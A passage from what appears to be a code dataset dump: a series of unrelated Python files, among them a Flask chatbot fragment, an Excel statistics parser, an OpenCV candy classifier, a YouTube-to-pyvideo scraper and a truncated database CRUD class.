        'chatterbot.logic.TimeLogicAdapter'
    ],
    database_uri='sqlite:///database.sqlite3'
)
@app.route("/")
def introduce():
# from data.about import bot
return render_template("index.html", data = "Hi")
@app.route("/get")
def get_bot_response():
if request.method == "POST":
userText = request.args.get('chat-input')
result = bot.get_response(userText)
return render_template("base.html", data = result)
else :
return render_template("base.html") |
24,658 | 40aae620a6bef4d615b934818411fccfdb73391b | # -*- coding: utf-8 -*-
import os
import pandas as pd
def find_file(pattern, path):
    """Walk `path` recursively and return every file whose *name*
    contains `pattern` (substring match), as full paths."""
    matches = []
    for root, dirs, files in os.walk(path):
        matches.extend(os.path.join(root, name)
                       for name in files
                       if pattern in name)
    return matches
def read_data(data):
    """Parse one Rosstat-style Excel sheet.

    Returns (document name, comment line, list of year column headers,
    cleaned DataFrame). The sheet layout is: row 0 = document name,
    row 1 = comment, row 2 = year headers, data from row 3.

    NOTE(review): ``skip_footer`` was deprecated and later removed from
    pandas.read_excel in favour of ``skipfooter`` -- confirm the pinned
    pandas version before upgrading.
    """
    # Re-read the same file with different skiprows to pick off the
    # three header rows individually.
    doc_nm = pd.read_excel(data, skiprows=0, skip_footer=1000)
    doc_com = pd.read_excel(data, skiprows=1, skip_footer=1000)
    doc_y = pd.read_excel(data, skiprows=2, skip_footer=1000)
    # test if file reads to DataFrame
    assert isinstance(doc_nm, pd.DataFrame)
    assert isinstance(doc_com, pd.DataFrame)
    assert isinstance(doc_y, pd.DataFrame)
    # Strip footnote digits from the document name.
    doc_name = "".join([i for i in doc_nm.keys()[0] if not i.isdigit()])
    doc_comment = doc_com.keys()[0]
    doc_years = [ii for ii in doc_y.keys() if 'год' in ii]
    datafile = pd.read_excel(data, skiprows=3, skip_footer=7)
    # Remove digits from the months names
    new_names = []
    for ii in datafile.keys():
        name = ''
        for jj in ii:
            if jj.isalpha():
                name = name + jj
        new_names.append(name)
    datafile.rename(columns=dict(zip(datafile.keys(), new_names)), inplace=True)
    # Replace space on the end of the region name if exists
    for nm in datafile['Unnamed']:
        # Also strips footnote digits from the region names.
        new = "".join([i for i in nm if not i.isdigit()])
        datafile.replace(nm, new, inplace=True)
        if nm[-1] == ' ':
            nnm = nm[:-1]
            datafile.replace(nm, nnm, inplace=True)
    return doc_name, doc_comment, doc_years, datafile
# # read data
# doc_name, doc_comment, doc_years, datafile = read_data('230-232 ' + source_definitions[2]['filename'])
#
# # todo:
# # - summable regions
#
# # - regions by district
# districts = []
# districts_rows = []
# for row, nm in enumerate(datafile['Unnamed']):
# if 'федеральный округ' in nm:
# districts.append(nm)
# districts_rows.append(row)
#
# center_district = datafile.iloc[districts_rows[0]:districts_rows[1]].reset_index(drop=True)
# north_west_district = datafile.iloc[districts_rows[1]:districts_rows[2]].reset_index(drop=True)
# south_district = datafile.iloc[districts_rows[2]:districts_rows[3]].reset_index(drop=True)
# north_caucasus_district = datafile.iloc[districts_rows[3]:districts_rows[4]].reset_index(drop=True)
# volga_district = datafile.iloc[districts_rows[4]:districts_rows[5]].reset_index(drop=True)
# ural_district = datafile.iloc[districts_rows[5]:districts_rows[6]].reset_index(drop=True)
# siberia_district = datafile.iloc[districts_rows[6]:districts_rows[7]].reset_index(drop=True)
# far_eastern_district = datafile.iloc[districts_rows[7]:districts_rows[8]].reset_index(drop=True)
# crimea_district = datafile.iloc[districts_rows[8]:].reset_index(drop=True)
#
# # Test districts names
# assert testable_district_names[0] in center_district['Unnamed'][0]
# assert testable_district_names[1] in north_west_district['Unnamed'][0]
# assert testable_district_names[2] in south_district['Unnamed'][0]
# assert testable_district_names[3] in north_caucasus_district['Unnamed'][0]
# assert testable_district_names[4] in volga_district['Unnamed'][0]
# assert testable_district_names[5] in ural_district['Unnamed'][0]
# assert testable_district_names[6] in siberia_district['Unnamed'][0]
# assert testable_district_names[7] in far_eastern_district['Unnamed'][0]
# assert testable_district_names[8] in crimea_district['Unnamed'][0]
#
#
# # Test regions names
# for test_dist, dist in zip(testable_district_names, districts):
# assert test_dist in dist
#
# # Test if all regions are in datafile
# for test_nm, nm in zip(testable_region_names, datafile['Unnamed'].values):
# assert test_nm in nm
#
# # Test years
# for test_ye, ye in zip(years, doc_years):
# assert str(test_ye) in ye |
24,659 | 345c9564c22ffe50ae071a5e37897001b1523fbf | from sklearn.ensemble import RandomForestClassifier
from imutils import resize
import pandas as pd
import numpy as np
import time
import cv2
dataX = pd.read_csv('./dataset/train_x.csv')
y = pd.read_csv('./dataset/train_y.csv')
clf = RandomForestClassifier(n_jobs=2, random_state=0)
clf.fit(dataX, np.ravel(y))
candy = ['Jet_azul', 'Flow_negra', 'Flow_blanca', 'Jumbo_naranja', 'Jumbo_roja', 'Chocorramo', 'Fruna_verde', 'Fruna_naranja', 'Fruna_roja', 'Fruna_amarilla']
candy_dict = {'Jet_azul':0, 'Flow_negra':0, 'Flow_blanca':0, 'Jumbo_naranja':0, 'Jumbo_roja':0, 'Chocorramo':0, 'Fruna_verde':0, 'Fruna_naranja':0, 'Fruna_roja':0, 'Fruna_amarilla':0}
def getRGB(image):
    """Average colour [r, g, b] of the bright foreground pixels of `image`.

    The foreground is whatever differs from the reference belt image
    'dataset/banda.jpeg' by more than a fixed gray-level threshold;
    only pixels whose B, G and R values are all above 150 are averaged.
    Returns [0, 0, 0] when no such pixel exists (the original divided
    by zero in that case).
    """
    kernelOP = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3,3))
    kernelCL = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11,11))
    img1 = cv2.imread("dataset/banda.jpeg")
    img1 = cv2.morphologyEx(img1, cv2.MORPH_OPEN, kernelOP, iterations=2)
    img2 = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernelCL, iterations=2)
    diff = cv2.absdiff(img2, img1)
    mask = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
    th = 35
    imask = mask > th
    # Keep only the pixels that differ from the background.
    canvas = np.zeros_like(img2, np.uint8)
    canvas[imask] = img2[imask]
    rprom = 0
    gprom = 0
    bprom = 0
    cont = 0
    a, b, c = canvas.shape
    for i in range(a-1):
        for j in range(b-1):
            arr = canvas[i][j]
            if ((arr > 150).all()):
                bprom += arr[0]
                gprom += arr[1]
                rprom += arr[2]
                cont += 1
    if cont == 0:
        # Original crashed with ZeroDivisionError here when no bright
        # foreground pixel was found.
        return [0, 0, 0]
    return [int(rprom/cont), int(gprom/cont), int(bprom/cont)]
# Main acquisition loop: watch the conveyor belt camera, detect a candy
# via background subtraction, classify it by colour+area with the
# RandomForest, and tally counts in candy_dict.
kernelOP = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
kernelCL = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))
cap = cv2.VideoCapture(1)
# Fix resolution and disable autofocus/auto-exposure so colours stay stable.
cap.set(3,640)
cap.set(4,480)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 0)
cap.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)
cap.set(cv2.CAP_PROP_EXPOSURE , 0.5)
fgbg = cv2.bgsegm.createBackgroundSubtractorMOG()
found = False
label = ''
while(True):
    ret, frame = cap.read()
    frame = frame[::, 95:525]  # crop to the belt region
    image = frame
    image = resize(image, width=500)
    image = image[50:3500, 75:480]
    image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
    height, width = image.shape[:2]
    # Foreground mask, cleaned with open+close morphology.
    thresh = fgbg.apply(image)
    thresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernelOP, iterations=2)
    thresh = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernelCL, iterations=2)
    im, contours, hierarchy= cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    # Trigger once per object: contour area within candy-size bounds.
    if len(contours) > 0 and cv2.contourArea(contours[0]) > 10000 and cv2.contourArea(contours[0]) < 80000 and found != True:
        found = True
        rect = cv2.minAreaRect(contours[0])
        box = cv2.boxPoints(rect)
        box = np.int0(box)
        cv2.drawContours(image,[box],0,(0,0,255),2)
        # Classify only when the object crosses the middle band of the frame.
        if rect[0][1] > 290 and rect[0][1] < 325:
            area = rect[1][0] * rect[1][1]
            rgb = getRGB(frame)
            print('Area: ', area)
            print('Color: ', rgb)
            data = rgb + [area]
            label = candy[int(clf.predict([data]))]
            candy_dict[label] += 1
            print(label)
    else:
        found = False
    cv2.putText(image, label, (width-400,height-100) , cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))
    cv2.imshow("objects Found", image)
    time.sleep(0.01)
    # 'q' quits.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
print(candy_dict)
cap.release()
cv2.destroyAllWindows()
|
24,660 | 4ffc1ffa3ad25d8ee4aa7b73f8c8786d38ffa4cf | # -*- coding:utf-8 -*-
import pynlpir
pynlpir.open()
def get_keywords(text, max_words=10):
    """Return up to `max_words` key words extracted from `text` by NLPIR."""
    return pynlpir.get_key_words(text, max_words)
if __name__=='__main__':
    # Count keyword occurrences across all profiles and keep per-url lists.
    keywords_count = {}
    url_keywords = {}
    for line in open('../data/xinjiang_profile_wx.dat'):
        # Each line is "<url>\t<content>"; extra tabs would raise here.
        url, content = line.strip('\n').split('\t')
        keys = get_keywords(content)
        url_keywords[url] = keys
        for k in keys:
            keywords_count[k] = keywords_count.get(k, 0) + 1
    # Keep only keywords that appear in more than 10 documents.
    keywords = [k for k, v in keywords_count.items() if v > 10]
|
24,661 | 0cb1f90a59d3e5fbebadb9e5e3cdedd13bc6262b | # Use pandas_datareader package to collect web data.
# Use matplotlib to draw a graph of the stock data
import pandas_datareader.data as web
import datetime
import matplotlib.pyplot as plt
start = datetime.datetime(2016, 2, 19) # Year, Month, Day
end = datetime.datetime(2016, 3, 4)
# gs = web.DataReader("078930.KS", "yahoo", start, end)
# gs = web.DataReader("078930", "naver", start, end) # The same as above.
# print(gs)
# print(gs.info()) # 10 data in total.
# Without explicit dates DataReader uses its own default start date.
gs = web.DataReader("078930.KS", "yahoo") # Start = 2016/08/16 ~ today.
print(gs.info()) # 1223 data in total
# plt.plot(gs['Adj Close']) # This is without the date information on the X-axis
# plt.show()
# Plot adjusted close against the DatetimeIndex so the X-axis shows dates.
plt.plot(gs.index, gs['Adj Close'])
plt.show()
|
24,662 | acf55ee4ca592d67bedcb874bdb6b55204287868 | from utils.visualization import Visualizer |
24,663 | e28fdcd6726c0834087e6d64277a8f94314ca1ed | from numpy import *
from pylab import *
N = 1000
xi = linspace(0,1,N)
t = linspace(0,1000,100*N)  # NOTE(review): t is never used below
p1,p2 = [1./6, 5./6]  # the two potential minima
'''
def V(x):
    a = 0.3 # shift energy up a bit...
    k = 10 #stiffness is good for a scale factor
    mp = 0.5*(p1+p2)
    V1 = lambda x: a+0.5*k*(x-p1)**2.
    V2 = lambda x: a+0.5*k*(x-p2)**2.
    Vx = (x-p2)*V1(x) + (p1-x)*V2(x)
    return Vx
    #if x <= mp: Vx = a+0.5*k*(x-p1)**2.
    #elif x >= mp: Vx = a+0.5*k*(x-p2)**2.
    #return Vx
'''
Vx = []
xf = []
# Sinusoidal double-well potential on [0, 1].
V = lambda x: 0.5*(1+sin(3*pi*(x-1./3)))
for x in xi:
    Vx.append( V(x))
    mp = 0.5*(p1+p2)
    # Map each initial point to the nearer minimum; the midpoint itself
    # is matched by a hard-coded rounded value.
    # NOTE(review): xf only has len(xi) entries because exactly one
    # linspace point rounds to 0.5045 for N=1000 -- with another N the
    # plot below can fail on mismatched lengths. Confirm intent.
    if x <mp: xf.append(p1)
    elif round(x,4) == 0.5045: xf.append(mp)
    elif x > mp: xf.append(p2)
plot(xi, Vx,'b.',label=r'$V(x)$')
plot(xi,xf,'r.',label=r'$x_f(x_i)$')
xlabel(r'$x$')
legend(loc=2)
savefig('discontinuity.png')
show()
|
24,664 | 9631e512b5765a81d9f04e7d0e064c7e2a66fda6 | """ Securely wraps a module so it can be securely imported
"""
from crypto_utils import *
# TODO: to make this many functions or one with many options?
def secure_build(module_file, private_key_file='private_key.pem',
                 public_key_file='public_key.pem', mode='v',
                 sig_file_name='signature.pem'):
    """Sign a module file and write the signature to disk.

    Loads (or generates and persists) a key pair, signs the raw bytes of
    `module_file`, verifies the signature when 'v' is in `mode`, and
    writes it to `sig_file_name`.

    Returns the signature, or None if signing failed.
    Raises FileNotFoundError if `module_file` does not exist.
    """
    # read module file
    print(f"Reading Module {module_file!r}...")
    try:
        # Context manager: the original leaked the open file handle.
        with open(module_file, "rb") as module_fh:
            code = module_fh.read()
    except FileNotFoundError:
        raise FileNotFoundError(f"{module_file!r} Was Not Found")
    # check if key exists, if not generate a key pair
    private_key, public_key = load_keys(private_key_file, public_key_file)
    if private_key is None or public_key is None:
        print("Generating New Keys...")
        private_key, public_key = gen_key_pair()
        write_keys(private_key, private_key_file,
                   public_key, public_key_file)
        print(f"Wrote Keys to {private_key_file!r} \
                and {public_key_file!r}")
    digest, sig = sign_data(private_key, code)
    if digest is None or sig is None:
        print("Unable To Sign Module")
        return None
    if 'v' in mode:
        print("Verifying Signature...")
        # quick verify test
        if verify_sig(code, public_key, sig):
            print("Successful Signature Verification")
        else:
            print("Could Not Verify Signature")
    write_signature(sig, sig_file_name)
    print(f"Wrote Signature To {sig_file_name!r}")
    return sig
|
24,665 | c6bc1e6db4717315c38e6b698e9c666ef35f39ad | """p2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from a1 import views
from django.contrib.auth import views as auth_views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
    path('admin/', admin.site.urls),
    # Public pages and authentication handled by a1.views.
    path('', views.IndexView.as_view(),name='home'),
    path('signup',views.SignUpView.as_view(),name='signup'),
    path('login',views.LoginFormView.as_view(),name='login'),
    path('logout',views.LogoutFormView.as_view(),name='logout'),
    path('a1/',include('a1.urls')),
    # Django's built-in password-reset flow with app-specific templates.
    path('reset_password/',auth_views.PasswordResetView.as_view(template_name="a1/password_reset.html"),name="reset_password"),
    path('reset_password_sent/',auth_views.PasswordResetDoneView.as_view(template_name="a1/password_reset_done.html"),name="password_reset_done"),
    path('reset/<uidb64>/<token>/',auth_views.PasswordResetConfirmView.as_view(template_name="a1/password_reset_confirm.html"),name="password_reset_confirm"),
    path('reset_password_complete/',auth_views.PasswordResetCompleteView.as_view(template_name="a1/password_reset_complete.html"),name="password_reset_complete"),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
24,666 | 0527e23762add4b4b81435535c67b32fd3a49370 | import math
x = int(input())
sqrt_x = int(math.sqrt(x))
for i in range(1, sqrt_x):
if(x % i == 0):
X = i
Z = x/i
Y = math.sqrt(1/3*(-7*X + math.sqrt(52*X*X*X*X+48*Z)))
a = round((X+Y)/2)
b = round((X-Y)/2)
if(a*a*a*a*a - b*b*b*b*b == x):
print(a, b)
exit()
|
24,667 | 535db5a2ad138b8eae4c4f03a63a8ccdc2122481 | #!/usr/bin/env python3
"""Scrape several conferences into pyvideo repository"""
import copy
import datetime
import json
import os
import pathlib
import re
import sys
import sh
import slugify
import yaml
import youtube_dl
from loguru import logger
JSON_FORMAT_KWARGS = {
'indent': 2,
'separators': (',', ': '),
'sort_keys': True,
}
def load_events(fich):
    """Read the events YAML file at path `fich`.

    Returns a tuple of (raw yaml text, parsed configuration dict).
    """
    yaml_text = fich.read_text()
    parsed = yaml.safe_load(yaml_text)
    return yaml_text, parsed
def save_file(path, text):
    """Write `text` to a new file at pathlib path `path`."""
    path.write_text(text)
def youtube_dl_version():
    """Returns the actual version of youtube-dl"""
    # NOTE(review): pkg_resources is deprecated in modern setuptools;
    # importlib.metadata is its successor -- confirm the minimum Python
    # version before switching.
    import pkg_resources
    return pkg_resources.get_distribution("youtube-dl").version
class Event:
    """PyVideo Event metadata.

    Holds one conference's configuration (from events.yml), scrapes its
    youtube lists, merges with any existing video files, and commits the
    result on a dedicated git branch.
    """

    def __init__(self, event_data: dict, repository_path):
        """Validate `event_data` and derive paths/flags.

        Raises ValueError when a mandatory field is missing/empty and
        TypeError when youtube_list has the wrong type.
        """
        self.videos = []
        self.youtube_videos = []
        self.file_videos = []
        self.repository_path = repository_path
        self.branch = event_data['dir']
        self.event_dir = self.repository_path / event_data['dir']
        self.video_dir = self.event_dir / 'videos'
        self.title = event_data['title']
        # Fail fast on missing/falsy mandatory fields.
        for mandatory_field in ['title', 'dir', 'issue', 'youtube_list']:
            if mandatory_field in event_data and event_data[mandatory_field]:
                pass
            else:
                logger.error('No {} data in conference {}', mandatory_field,
                             self.title)
                raise ValueError("{} can't be null".format(mandatory_field))
        self.issue = event_data['issue']
        # Normalise youtube_list to a list of urls.
        if isinstance(event_data['youtube_list'], str):
            self.youtube_lists = [event_data['youtube_list']]
        elif isinstance(event_data['youtube_list'], list):
            self.youtube_lists = event_data['youtube_list']
        else:
            raise TypeError(
                "youtube_list must be a string or a list of strings")
        self.related_urls = event_data.get('related_urls', [])
        self.language = event_data.get('language', None)
        self.tags = event_data.get('tags', [])
        if not self.tags:
            self.tags = []
        # An explicit date range lets us sanity-check youtube upload dates.
        if 'dates' in event_data and event_data['dates']:
            self.know_date = True
            self.date_begin = event_data['dates']['begin']
            self.date_end = event_data['dates'].get('end', self.date_begin)
            self.date_default = event_data['dates'].get(
                'default', self.date_begin)
        else:
            self.know_date = False
        self.minimal_download = event_data.get('minimal_download', False)
        if self.minimal_download:
            self.branch = "{}--minimal-download".format(self.branch)
        # Overwrite policy: wipe everything, add only new files, and/or
        # overwrite selected fields of existing files.
        self.overwrite, self.add_new_files, self.wipe = False, False, False
        self.overwrite_fields = []
        if 'overwrite' in event_data and event_data['overwrite']:
            overwrite = event_data['overwrite']
            self.overwrite = True
            if 'all' in overwrite and overwrite['all']:
                self.wipe = True
            else:
                if 'add_new_files' in overwrite and overwrite['add_new_files']:
                    self.add_new_files = True
                if ('existing_files_fields' in overwrite
                        and overwrite['existing_files_fields']):
                    self.overwrite_fields = overwrite['existing_files_fields']

    def create_branch(self):
        """Create a new branch in pyvideo repository to add a new event"""
        os.chdir(str(self.repository_path))
        sh.git.checkout('master')
        sh.git.checkout('-b', self.branch)
        logger.debug('Branch {} created', self.branch)

    def create_dirs(self):
        """Create new directories and conference file in pyvideo repository to
        add a new event"""
        for new_directory in [self.event_dir, self.event_dir / 'videos']:
            # exist_ok only when overwriting a previously scraped event.
            new_directory.mkdir(exist_ok=self.overwrite)
            logger.debug('Dir {} created', new_directory)

    def create_category(self):  # , conf_dir, title):
        """Create category.json for the conference"""
        category_file_path = self.event_dir / 'category.json'
        category_data = {
            'title': self.title,
        }
        category_data_text = json.dumps(category_data, **
                                        JSON_FORMAT_KWARGS) + '\n'
        save_file(category_file_path, category_data_text)
        logger.debug('File {} created', category_file_path)

    def download_video_data(self):
        """Download youtube metadata corresponding to this event youtube
        lists"""
        def scrape_url(url):
            """Scrape the video list, youtube_dl does all the heavy lifting"""
            ydl_opts = {
                "ignoreerrors": True,  # Skip private and unavaliable videos
            }
            ydl = youtube_dl.YoutubeDL(ydl_opts)
            with ydl:
                result_ydl = ydl.extract_info(
                    url,
                    download=False  # No download needed, only the info
                )
            logger.debug('Url scraped {}', url)
            if 'entries' in result_ydl:
                # It's a playlist or a list of videos
                return result_ydl['entries']
            # Just a video
            return [result_ydl]
        # Flatten all configured lists into one sequence of video dicts.
        youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])
        for youtube_video_data in youtube_list:
            if youtube_video_data:  # Valid video
                self.youtube_videos.append(
                    Video.from_youtube(
                        video_data=youtube_video_data, event=self))
            else:
                # ignoreerrors yields None entries for skipped videos.
                logger.warning('Null youtube video')

    def load_video_data(self):
        """Load video data form existing event video files"""
        self.file_videos = [
            Video.from_file(path, self)
            for path in self.video_dir.glob('*.json')
        ]

    def merge_video_data(self):
        """Merge old video data when configured so"""
        if self.overwrite:
            if self.wipe:
                # Discard everything on disk; keep only freshly scraped data.
                self.videos = self.youtube_videos
            elif self.add_new_files or self.overwrite_fields:
                # Index existing files by filename and by video url so a
                # rescraped video keeps its established filename.
                old_videos = {
                    video.filename: video
                    for video in self.file_videos
                }
                old_videos_url = {
                    video.metadata['videos'][0]['url']: video
                    for video in self.file_videos
                }
                new_videos = {}
                for video in self.youtube_videos:
                    new_video_url = video.metadata['videos'][0]['url']
                    if new_video_url in old_videos_url:
                        new_video_filename = old_videos_url[new_video_url].filename
                    else:
                        new_video_filename = video.filename
                    new_videos[new_video_filename] = video
                if self.overwrite_fields:
                    # Warn about files whose video no longer appears upstream.
                    forgotten = set(old_videos) - set(new_videos)
                    for name in forgotten:
                        logger.warning('Missing video: {} {}',
                                       old_videos[name].filename,
                                       old_videos[name].metadata['videos'][0]['url'],
                                       )
                    changes = set(new_videos).intersection(set(old_videos))
                    for path in changes:
                        merged_video = old_videos[path].merge(
                            new_videos[path], self.overwrite_fields)
                        self.videos.append(merged_video)
                else:
                    self.videos = self.file_videos
                if self.add_new_files:
                    adds = set(new_videos) - set(old_videos)
                    self.videos.extend([new_videos[path] for path in adds])
        else:  # not self.overwrite
            self.videos = self.youtube_videos

    def save_video_data(self):
        """Save all event videos in PyVideo format"""
        if self.overwrite:
            # Erase old event videos
            for path in self.video_dir.glob('*.json'):
                path.unlink()
        for video in self.videos:
            video.save()

    def create_commit(self, event_data_yaml):
        """Create a new commit in pyvideo repository with the new event data"""
        os.chdir(str(self.repository_path))
        sh.git.checkout(self.branch)
        sh.git.add(self.event_dir)
        # The scraping config is embedded in the commit message for audit.
        message_body = (
            '\n\nEvent config:\n~~~yaml\n{}\n~~~\n'.format(event_data_yaml)
            + '\nScraped with [pyvideo_scrape]'
            + '(https://github.com/pyvideo/pyvideo_scrape)')
        if self.minimal_download:
            # Minimal downloads are pushed for review; full scrapes only
            # commit locally.
            message = ('Minimal download: '
                       + '{}\n\nMinimal download executed for #{}'.format(
                           self.title, self.issue)
                       + '\n\nOnly data that needs [no review](https://'
                       + 'github.com/pyvideo/pyvideo_scrape#use-cases) was scraped.'
                       + '\nThis event needs further scraping and human '
                       + 'reviewing for the description and other data to show.'
                       + message_body)
            sh.git.commit('-m', message)
            sh.git.push('--set-upstream', 'origin', self.branch)
            # ~ sh.git.push('--set-upstream', '--force', 'origin', self.branch)
            sh.git.checkout('master')
        else:
            message = (
                'Scraped {}\n\nFixes #{}'.format(self.branch, self.issue)
                + message_body)
            sh.git.commit('-m', message)
            sh.git.checkout('master')
        logger.debug('Conference {} commited', self.branch)
class Video:
    """PyVideo Video metadata.

    One talk's metadata dict plus the filename (slug) it is stored under;
    constructed either from an existing json file or from youtube-dl data.
    """

    @staticmethod
    def __calculate_title(video_data):
        """Calculate title from youtube fields"""
        # Preference order: fulltitle, title, then the download filename.
        title = 'Unknown'
        if 'fulltitle' in video_data.keys():
            title = video_data['fulltitle']
        elif 'title' in video_data.keys():
            title = video_data['title']
        elif '_filename' in video_data.keys():
            title = video_data['_filename']
        return title

    def __calculate_slug(self):
        """Calculate slug from title"""
        return slugify.slugify(self.metadata['title'])

    def __calculate_date_recorded(self, upload_date_str):
        """Calculate record date from youtube field and event dates"""
        # upload_date_str is youtube-dl's YYYYMMDD string.
        upload_date = datetime.date(
            int(upload_date_str[0:4]),
            int(upload_date_str[4:6]), int(upload_date_str[6:8]))
        if self.event.know_date:
            # Upload dates outside the event window are replaced with the
            # configured default date.
            if not (self.event.date_begin <= upload_date <=
                    self.event.date_end):
                return self.event.date_default.isoformat()
        return upload_date.isoformat()

    def __init__(self, event):
        self.event = event
        self.filename = None
        self.metadata = {}

    @classmethod
    def from_file(cls, path, event):
        """Contructor. Retrieves video metadata from file"""
        self = cls(event)
        self.filename = path.stem  # Name without .json
        try:
            with path.open() as f_path:
                self.metadata = json.load(f_path)
        except ValueError:
            print('Json syntax error in file {}'.format(path))
            raise
        return self

    @classmethod
    def from_youtube(cls, video_data, event):
        """Contructor. Retrieves video metadata with youtube-dl"""
        self = cls(event)
        metadata = self.metadata
        metadata['title'] = self.__calculate_title(video_data)
        self.filename = self.__calculate_slug()
        metadata['speakers'] = ['TODO']  # Needs human intervention later
        # youtube_id = video_data['display_id']
        # metadata['thumbnail_url'] =
        # 'https://i.ytimg.com/vi/{}/maxresdefault.jpg'.format(youtube_id)
        metadata['thumbnail_url'] = video_data['thumbnail']
        metadata['videos'] = [{
            'type': 'youtube',
            'url': video_data['webpage_url']
        }]
        metadata['recorded'] = self.__calculate_date_recorded(
            video_data['upload_date'])
        # optional values
        metadata['copyright_text'] = video_data['license']
        metadata['duration'] = video_data['duration']  # In seconds
        metadata['language'] = video_data['formats'][0].get(
            'language', event.language)
        if not metadata['language']:
            metadata['language'] = event.language
        metadata['related_urls'] = copy.deepcopy(event.related_urls)
        if event.minimal_download:
            # Minimal mode keeps only data that needs no human review.
            metadata['speakers'] = []
            metadata['tags'] = event.tags
            metadata['description'] = ''
        else:
            metadata['tags'] = sorted(
                set(video_data['tags']).union(set(event.tags)))
            metadata['description'] = video_data['description']
            # Harvest every url mentioned in the description as related.
            description_urls = list(
                set(
                    re.findall(r'http[s]?://[^ \\\n\t()[\]"`´\']+', video_data[
                        'description'])))
            for url in description_urls:
                metadata['related_urls'].append({'label': url, 'url': url})
        return self

    def merge(self, new_video, fields):
        """Create video copy overwriting fields """
        # Fields listed in `fields` come from new_video; the rest are kept.
        merged_video = Video(self.event)
        merged_video.filename = self.filename
        for field in self.metadata:
            if field in set(fields):
                merged_video.metadata[field] = new_video.metadata.get(field)
            else:
                merged_video.metadata[field] = self.metadata.get(field)
        return merged_video

    def save(self):
        """"Save to disk"""
        path = self.event.video_dir / '{}.json'.format(self.filename)
        if path.exists():
            # Deduplicate colliding slugs with a numeric suffix (-2, -3, ...).
            duplicate_num = 1
            new_path = path
            while new_path.exists():
                duplicate_num += 1
                new_path = path.parent / (
                    path.stem + '-{}{}'.format(duplicate_num, path.suffix))
            logger.debug('Duplicate, renaming to {}', path)
            path = new_path
        data_text = json.dumps(self.metadata, **JSON_FORMAT_KWARGS) + '\n'
        save_file(path, data_text)
        logger.debug('File {} created', path)
@logger.catch
def main():
    """Scrape several conferences into pyvideo repository"""
    logger.add(
        sys.stderr,
        format="{time} {level} {message}",
        filter="my_module",
        level="DEBUG")
    time_init = datetime.datetime.now()
    logger.debug('Time init: {}', time_init)
    logger.debug('youtube-dl version: {} ', youtube_dl_version())
    # events.yml in the current directory drives the whole run.
    cwd = pathlib.Path.cwd()
    events_file = cwd / 'events.yml'
    event_data_yaml, events_data = load_events(events_file)
    pyvideo_repo = pathlib.PosixPath(
        events_data['repo_dir']).expanduser().resolve()
    events = [
        Event(event_data, repository_path=pyvideo_repo)
        for event_data in events_data['events']
    ]
    for event in events:
        try:
            event.create_branch()
            event.create_dirs()
            event.create_category()
        except (sh.ErrorReturnCode_128, FileExistsError) as exc:
            # Branch or directory already exists: skip this event.
            logger.warning('Event {} skipped', event.branch)
            logger.debug(exc.args[0])
            continue
        event.download_video_data()
        event.load_video_data()
        event.merge_video_data()
        event.save_video_data()
        event.create_commit(event_data_yaml)
    time_end = datetime.datetime.now()
    time_delta = str(time_end - time_init)
    logger.debug('Time init: {}', time_init)
    logger.debug('Time end: {}', time_end)
    logger.debug('Time delta: {}', time_delta)


if __name__ == '__main__':
    main()
|
24,668 | f7922543bca34c7a6c175781d749a7d498915f86 | """CRUD actions.
"""
import psycopg2
import app.util as util
class Action(object):
    """Base CRUD action: holds DB connection params and model constructors."""

    def __init__(self, db_conn_params, model_inits):
        self.model_inits = model_inits
        self.db_conn_params = db_conn_params
class CreateAction(Action):
    """Create-candidate action: builds models from artifacts and persists
    them in one transaction per batch."""

    def execute(self, artifacts):
        """Persist each artifact's address, candidate and experiences.

        Raises util.ActionError on constraint violations or invalid
        values; re-raises unexpected database errors.
        """
        # Phase 1: build all model instances before touching the DB.
        batch_models = list()
        for artifact in artifacts:
            models_row = {
                'address': self.model_inits['address'](*[
                    artifact['address']['state'],
                    artifact['address']['city'],
                    artifact['address']['neighborhood'],
                    artifact['address']['place_name'],
                    artifact['address']['place_number'],
                    artifact['address']['place_complement'],
                    artifact['address']['cep'],
                    artifact['address']['latitude'],
                    artifact['address']['longitude']
                ]),
                'candidate': self.model_inits['candidate'](*[
                    artifact['name'],
                    artifact['image_name'],
                    artifact['birthdate'],
                    artifact['gender'],
                    artifact['email'],
                    artifact['phone'],
                    artifact['tags']
                ])
            }
            # Experiences are optional and come in two flavours.
            models_row['experiences'] = list()
            for _type in ['professional', 'educational']:
                key = '%s_experiences' % _type
                if key in artifact and artifact[key]:
                    experiences = artifact[key]
                    for experience in experiences:
                        models_row['experiences'].append(self.model_inits['experience'](*[
                            _type,
                            experience['institution_name'],
                            experience['title'],
                            experience['start_date'],
                            experience['end_date'],
                            experience['description']
                        ]))
            batch_models.append(models_row)
        # Phase 2: save everything; commit only after the whole batch.
        try:
            db_conn = psycopg2.connect(**self.db_conn_params)
            db_cur = db_conn.cursor()
            for models_row in batch_models:
                address_id = models_row['address'].save(db_cur)
                candidate_id = models_row['candidate'].save(db_cur, address_id)
                for model in models_row['experiences']:
                    model.save(db_cur, candidate_id)
            db_conn.commit()
        except util.DatabaseConstraintViolationError as err:
            # Translate DB constraint failures into user-facing errors.
            if err.constraint == util.DatabaseConstraintViolationError.UNIQUE:
